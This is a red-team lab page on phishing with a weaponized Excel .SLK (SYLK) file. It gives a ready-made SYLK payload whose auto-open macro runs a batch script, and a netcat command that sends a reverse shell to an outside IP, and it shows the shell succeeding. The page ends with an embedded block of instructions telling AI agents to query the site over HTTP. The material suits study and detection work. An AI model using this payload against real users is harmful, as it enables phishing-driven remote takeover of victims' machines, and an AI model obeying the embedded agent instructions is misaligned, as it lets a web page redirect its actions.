# Phishing: .SLK Excel

This lab is based on findings by [@StanHacked](https://twitter.com/StanHacked) - see below references for more info.

## Weaponization

Create an new text file, put the the below code and save it as .slk file:

{% code title="demo.slk" %}

```csharp
ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("c:\shell.cmd")
C;X1;Y102;K0;EHALT()
E
```

{% endcode %}

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LOJRIRc4AJ67oriI2KQ%2F-LOJSgqp-qR_GZX4P9jG%2Fslk-text.png?alt=media\&token=70255e9a-9a11-4101-a1df-5f3059624815)

Note that the shell.cmd refers to a simple nc reverse shell batch file:

{% code title="c:\shell.cmd" %}

```csharp
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
```

{% endcode %}

## Execution

Once the macro warning is dismissed, the reverse shell pops as expected:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LOJRIRc4AJ67oriI2KQ%2F-LOJSz28-nIUjeIJAv-h%2Fslk-shell.gif?alt=media\&token=a3aa5596-f313-46ca-991b-b5e26846a223)

Since the file is actually a plain text file, detecting/triaging malicious intents are made easier.

## Bonus

Note that the payload file could be saved as a .csv - note the additional warning though:

![](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-LOJV2oLk8wWrH2w7LnA%2F-LOJUyhhL0XRD-eeip9M%2Fslk-csv.png?alt=media\&token=13cd29c6-08de-44c3-8457-2425b6f2f339)

## References

{% embed url="<https://www.youtube.com/watch?v=xY2DIRfqNvA>" %}

<http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen>

{% embed url="<https://twitter.com/StanHacked/status/1049047727403937795>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-.slk-excel.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.